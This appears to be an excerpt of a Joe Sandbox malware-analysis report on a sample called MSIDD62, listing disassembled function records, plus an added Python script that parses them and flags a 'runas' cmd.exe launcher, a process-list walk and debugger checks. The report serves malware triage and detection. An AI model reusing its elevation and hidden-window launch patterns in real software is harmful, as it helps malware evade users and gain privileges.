                                                                      • EnumWindows.USER32(003E7A90,?), ref: 003E79B3
                                                                      • BringWindowToTop.USER32(?), ref: 003E79C2
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 003E79DF
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 003E79EC
                                                                        • Part of subcall function 003E7D30: CloseHandle.KERNEL32(?,755CD0F6,00000010,00000010,?,?), ref: 003E7D72
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 003E7A9C
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 003E7AB4
                                                                      Strings
                                                                      Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as for the first function above (0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp at offset 003E0000; hcaresult_12_2_3e0000_MSIDD62.jbxd).
                                                                      Similarity
                                                                      • API ID: Window$Handle$AddressExecuteForegroundModuleProcProcessShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                      • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                      • API String ID: 1023610922-986041216
                                                                      • Opcode ID: 6128159a1b4d92ff310769b615d80500b454131e153577702823a22f84e7d430
                                                                      • Instruction ID: 4108c1abb875e469d437025c4cef13bfb58f6e51871c20ebf481b82183e9e42e
                                                                      • Opcode Fuzzy Hash: 6128159a1b4d92ff310769b615d80500b454131e153577702823a22f84e7d430
                                                                      • Instruction Fuzzy Hash: AAE1C071E00259DFDB11DFA9C888BAEB7F5FF18310F258269E515EB291DB349901CBA0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: _swprintf$FreeLocal
• String ID: %$+
• API String ID: 2429749586-2626897407
• Opcode ID: 3ada492eb606007cef53eb0810d84f2afe81b2541e39e9e6a30f268aee45d874
• Instruction ID: ea4c736b21c7f0dc49e5d5919c150a0294538b6159c165b774a1fb8658b06dfd
• Opcode Fuzzy Hash: 3ada492eb606007cef53eb0810d84f2afe81b2541e39e9e6a30f268aee45d874
• Instruction Fuzzy Hash: 6A02DE71E102699FDB16CFA9DC40BAEBBB5FF49300F15462AF811AB281D734A941CB91
APIs
• RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 003F12C4
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,004457C0,00000800), ref: 003F12E1
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: OpenQueryValue
• String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
• API String ID: 4153817207-1914306501
• Opcode ID: 14f0a01466cd002d8f28db3708d873f8b8938a49391d2c45257a28bb898956a1
• Instruction ID: c05156054d0c722f61ded7e4f1bcf96f4c2326e9178f9350dad0df5dffd2b373
• Opcode Fuzzy Hash: 14f0a01466cd002d8f28db3708d873f8b8938a49391d2c45257a28bb898956a1
• Instruction Fuzzy Hash: 42E12629A0035ACBCB3A9F14E840376B3E1FF95740F5A846ADB45CB696E771CC82C395
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003E6242
• CloseHandle.KERNEL32(00000000), ref: 003E6285
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 003E62E1
• OpenProcess.KERNEL32(00000410,00000000,?), ref: 003E62FD
• CloseHandle.KERNEL32(00000000), ref: 003E6445
• Process32NextW.KERNEL32(?,0000022C), ref: 003E6463
• CloseHandle.KERNEL32(00000000), ref: 003E648E
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
• String ID:
• API String ID: 708755948-0
• Opcode ID: e346f32d7d886142333a9ec0103d232aab8c7fcef291c463dac37ccdc567edf1
• Instruction ID: f3d6ca2e0717f41039d24e68af7a443e4889901166b4fab47297791526ffd3cc
• Opcode Fuzzy Hash: e346f32d7d886142333a9ec0103d232aab8c7fcef291c463dac37ccdc567edf1
• Instruction Fuzzy Hash: 0AA18A70901269DBDB21DF65C849BDEBBB8EF44704F1082D9E419A72D0D7B86E84CF94
APIs
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: c7b8dc240282a7a5510ecc3e03be49f14ab8a7257404a6045dc805de84fa9c73
• Instruction ID: 92cd29b00bd1a58eb80dad67928f0923bd740d049928f324980db03a00b21234
• Opcode Fuzzy Hash: c7b8dc240282a7a5510ecc3e03be49f14ab8a7257404a6045dc805de84fa9c73
• Instruction Fuzzy Hash: BDD24971E086288FDB65CE28ED407EAB7B5EB85305F5441EBD40DE7240EB78AE818F45
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,00423EC1,00000002,00000000,?,?,?,00423EC1,?,00000000), ref: 00423C3C
• GetLocaleInfoW.KERNEL32(?,20001004,00423EC1,00000002,00000000,?,?,?,00423EC1,?,00000000), ref: 00423C65
• GetACP.KERNEL32(?,?,00423EC1,?,00000000), ref: 00423C7A
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: 298165ed825df0dbebc88ec0e0a98ffcfabe127ce2165f473f965049810c4140
• Instruction ID: 9f3e923bda5a300087df26d2158064d5b8b883c7e715afc46cdac063bc26ceaa
• Opcode Fuzzy Hash: 298165ed825df0dbebc88ec0e0a98ffcfabe127ce2165f473f965049810c4140
• Instruction Fuzzy Hash: 2921B733700120A6EB34CF16E900A9776B6AB50F52BD58426E50AE7201E73EDF41C358
APIs
  • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
  • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
• GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00423E84
• IsValidCodePage.KERNEL32(00000000), ref: 00423ECD
• IsValidLocale.KERNEL32(?,00000001), ref: 00423EDC
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00423F24
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00423F43
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID:
• API String ID: 415426439-0
• Opcode ID: c5f36cd20b5e213495f66198909215f8b55dfdb382b865dc1fe9aa905d4ed3d9
• Instruction ID: 5918bea2b0c1ff1b954371ec1f3577a1673c409a817c1869aa3c958deb058858
• Opcode Fuzzy Hash: c5f36cd20b5e213495f66198909215f8b55dfdb382b865dc1fe9aa905d4ed3d9
• Instruction Fuzzy Hash: 3451A171B00225ABDF20DFA5EC45ABB77B8AF44706F95442AE500E7250E77CDE08CB69
APIs
  • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
  • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
• GetACP.KERNEL32(?,?,?,?,?,?,0041994B,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004234D5
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041994B,?,?,?,00000055,?,-00000050,?,?), ref: 00423500
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00423663
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid
• String ID: utf8
• API String ID: 607553120-905460609
• Opcode ID: 055363e813afd50b0827dafecd105ad4a5e55e958c69a869a54332ac920c4360
• Instruction ID: 7fe38f0c1d5247d2ffa1c8824f60ad0be688433b91b00623f7cf5c105c35b7f2
• Opcode Fuzzy Hash: 055363e813afd50b0827dafecd105ad4a5e55e958c69a869a54332ac920c4360
• Instruction Fuzzy Hash: BE710871B00321BADB25AF35EC42BA773B8AF05705F90446BF509D7281EB7CEA418659
APIs
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
• Instruction ID: ecb972cfb30e69e50b71a92e0170889ab507eb156859c0ce8d0f4975dfeaf365
• Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
• Instruction Fuzzy Hash: 28B14972A002559FDB118F68C8817EEBBA6EF59354F14816BE805AB341D3389D81CBE9
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004083C9
• IsDebuggerPresent.KERNEL32 ref: 00408495
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004084B5
• UnhandledExceptionFilter.KERNEL32(?), ref: 004084BF
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: fc797f530f18eb8001a8b3bdb3904989bca17ed8397d8b1166945e9eb7661c4c
• Instruction ID: 3959213b7dfa1d1df3849048af917da5a261bdd5227f13d02cf305012448d43e
• Opcode Fuzzy Hash: fc797f530f18eb8001a8b3bdb3904989bca17ed8397d8b1166945e9eb7661c4c
• Instruction Fuzzy Hash: 18313A75D013189BDB20DF64D9497CDBBB8AF04304F1041AEE44CAB290EB755A85CF48
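Every record on this page has the same shape: an APIs list (calls made by callees are marked "Part of subcall function"), the memory dump the function was lifted from, and a Similarity block whose String ID joins the function's strings with "$". Three records here are the ones a triager stops at: the launcher whose strings build a "%s\System32\cmd.exe" / "/C ""%s" %s"" command line and carry the ShellExecute verbs "open" and "runas" (the verb that raises the UAC elevation prompt; refs 003E79B3 to 003E7AB4), the Toolhelp32 walk that calls OpenProcess with access 0x410 (refs 003E6242 to 003E648E), and the IsDebuggerPresent / SetUnhandledExceptionFilter routine (refs 004083C9 to 004084BF). The script below is an added example, not part of the report and not Joe Sandbox code: it parses records in this layout, decodes the OpenProcess access mask into named rights, and applies rules that match those three patterns. The regexes, the rule wording and the SAMPLE text are the example's own assumptions; SAMPLE is constructed from records above and trimmed to the lines the parser reads.

```python
"""Joe Sandbox function-record triage. Added example (not report or Joe Sandbox code); the layout it assumes, regexes, rules and SAMPLE are its own."""
import re
from dataclasses import dataclass, field

# Constructed sample: three records excerpted from the report above and trimmed; a record starts at its "APIs" header.
SAMPLE = r'''
APIs
• EnumWindows.USER32(003E7A90,?), ref: 003E79B3
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 003E79DF
  • Part of subcall function 003E7D30: CloseHandle.KERNEL32(?,755CD0F6,00000010,00000010,?,?), ref: 003E7D72
Similarity
• String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
• Opcode ID: 6128159a1b4d92ff310769b615d80500b454131e153577702823a22f84e7d430
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003E6242
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 003E62E1
• OpenProcess.KERNEL32(00000410,00000000,?), ref: 003E62FD
• Process32NextW.KERNEL32(?,0000022C), ref: 003E6463
Similarity
• String ID:
• Opcode ID: e346f32d7d886142333a9ec0103d232aab8c7fcef291c463dac37ccdc567edf1
APIs
• IsDebuggerPresent.KERNEL32 ref: 00408495
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004084B5
Similarity
• Opcode ID: fc797f530f18eb8001a8b3bdb3904989bca17ed8397d8b1166945e9eb7661c4c
'''

# API bullet: optional "Part of subcall function X:" prefix, Name.MODULE, optional (args), then "ref: <addr>".
API_RE = re.compile(r"^•\s+(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s+)?(?P<name>\w+)"
                    r"\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s+(API ID|String ID|Opcode ID):\s*(.*)$")
PROCESS_ACCESS = {  # OpenProcess dwDesiredAccess bits (winnt.h)
    0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
    0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
    0x80: "PROCESS_CREATE_PROCESS", 0x100: "PROCESS_SET_QUOTA", 0x200: "PROCESS_SET_INFORMATION",
    0x400: "PROCESS_QUERY_INFORMATION", 0x800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall: bool  # listed under "Part of subcall function", i.e. issued by a callee

@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""

    @property
    def strings(self):
        return [s for s in self.string_id.split("$") if s]  # the report joins strings with "$"

def parse_records(text):
    """Split report text into FuncRecord objects, one per "APIs" header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] is not None))
        elif (m := FIELD_RE.match(line)):
            setattr(cur, m.group(1).lower().replace(" ", "_"), m.group(2).strip())
    return records

def decode_process_access(mask):
    """Expand an OpenProcess access mask into named rights; unknown bits are kept as hex."""
    names = [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    return names + ([f"0x{leftover:X}"] if leftover else [])

def triage(rec):
    """Findings for one record; the rules mirror signatures listed at the top of the report."""
    findings, direct, strings = [], {c.name for c in rec.calls if not c.subcall}, rec.strings
    if "runas" in strings and any("cmd.exe" in s for s in strings):
        findings.append("builds a cmd.exe command line and launches it with the 'runas' verb (UAC prompt)")
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= direct:
        findings.append("walks the process list with Toolhelp32")
    for c in rec.calls:  # decode a literal dwDesiredAccess; "?" means the value was not recovered
        if c.name == "OpenProcess" and c.args and re.fullmatch(r"[0-9A-Fa-f]+", c.args[0]):
            findings.append(f"OpenProcess at {c.ref} with " + "|".join(decode_process_access(int(c.args[0], 16))))
    if "IsDebuggerPresent" in direct:
        findings.append("checks IsDebuggerPresent")
    return findings

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.opcode_id[:16], triage(rec))
```

Run it as a script to see the findings for the embedded sample, or pass the saved page text to `parse_records` to cover every record. Calls listed as "Part of subcall function" are kept in the record but left out of the name-set rules, so a rule fires on the function that actually issues the call rather than on each of its callers; the "?" placeholders the report uses for arguments it could not recover are skipped rather than guessed.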
APIs
  • Part of subcall function 00407875: EnterCriticalSection.KERNEL32(00444AF8,00000000,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 00407880
  • Part of subcall function 00407875: LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26,?,?,?,755CD0F6), ref: 004078BD
• GetProcessHeap.KERNEL32 ref: 003E2565
  • Part of subcall function 0040782B: EnterCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407835
  • Part of subcall function 0040782B: LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407868
  • Part of subcall function 0040782B: RtlWakeAllConditionVariable.NTDLL ref: 004078DF
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
• String ID: WD$ WD$<WD
• API String ID: 325507722-3183347824
• Opcode ID: 786eebcaec90935a2f8e8ea94c5e1d57d1814bc1e15a8b58a6cfe5f642dbbdf7
• Instruction ID: 8b9c6f04b6d304b22481d9b3d44cbcf3bd7873a4db0f4da5ef411da612fe2a1d
• Opcode Fuzzy Hash: 786eebcaec90935a2f8e8ea94c5e1d57d1814bc1e15a8b58a6cfe5f642dbbdf7
• Instruction Fuzzy Hash: 71218DB5914B00DBDF10EFA5E946B497BE4E70A329F20423AE424973D2D7BC6900CB9D
                                                                      APIs
                                                                      • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,003E3270,?), ref: 003F2176
                                                                      • FormatMessageA.KERNEL32(00001300,00000000,755CD0F6,00000000,00000000,00000000,00000000,?,?,?,003E3270,?), ref: 003F2198
                                                                      Strings
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: FormatInfoLocaleMessage
• String ID: !x-sys-default-locale
• API String ID: 4235545615-2729719199
APIs
  • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
  • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042387B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004238C5
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042398B
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0040C4AE
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040C4B8
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C4C5
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• LoadResource.KERNEL32(00000000,00000000,755CD0F6,00000001,00000000,?,00000000,00429360,000000FF,?,003E1D1C,00000010,?,?,?,-00000010), ref: 003E1D9B
• LockResource.KERNEL32(00000000,?,003E1D1C,00000010,?,?,?,-00000010,00429340,000000FF,?,003E202C,?,00000000,0042938D,000000FF), ref: 003E1DA6
• SizeofResource.KERNEL32(00000000,00000000,?,003E1D1C,00000010,?,?,?,-00000010,00429340,000000FF,?,003E202C,?,00000000,0042938D), ref: 003E1DB4
Similarity
• API ID: Resource$LoadLockSizeof
• String ID:
• API String ID: 2853612939-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041D5D7,00000000,00000000,00000000), ref: 0041D496
Similarity
• API ID: InformationTimeZone
• String ID:
• API String ID: 565725191-0
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041DB2B,?,?,00000008,?,?,00426AD4,00000000), ref: 0041DD5D
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00408032
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
APIs
  • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
  • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00423ACE
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
APIs
  • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
  • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
• EnumSystemLocalesW.KERNEL32(00423827,00000001,00000000,?,-00000050,?,00423E58,00000000,?,?,?,00000055,?), ref: 00423773
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
APIs
  • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
  • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00423A43,00000000,00000000,?), ref: 00423CD5
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: a5e8a6a21838863aedf798e891e7909ebbe76be076fef209f881baa9a906cbd2
• Instruction ID: e43d108d74d5de9ab12eb5cdc00dda9a408390cd8c9540dfb3c6596c5468d332
• Opcode Fuzzy Hash: a5e8a6a21838863aedf798e891e7909ebbe76be076fef209f881baa9a906cbd2
• Instruction Fuzzy Hash: 0CF0F9327101217BDB245F25EC06BBB7774EB80755F54442AEC46A3240DA7CFF42C698
APIs
  • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
  • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
• EnumSystemLocalesW.KERNEL32(00423A7A,00000001,?,?,-00000050,?,00423E1C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004237E6
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: db568e506ce5864a79fcae0c26fd302740bf233124cc15e088feaa57bf57b2b2
• Instruction ID: 662bf13dfdc1097d413deafc3dc1c218f053f99cc9c24ade101017b12ad9a9d5
• Opcode Fuzzy Hash: db568e506ce5864a79fcae0c26fd302740bf233124cc15e088feaa57bf57b2b2
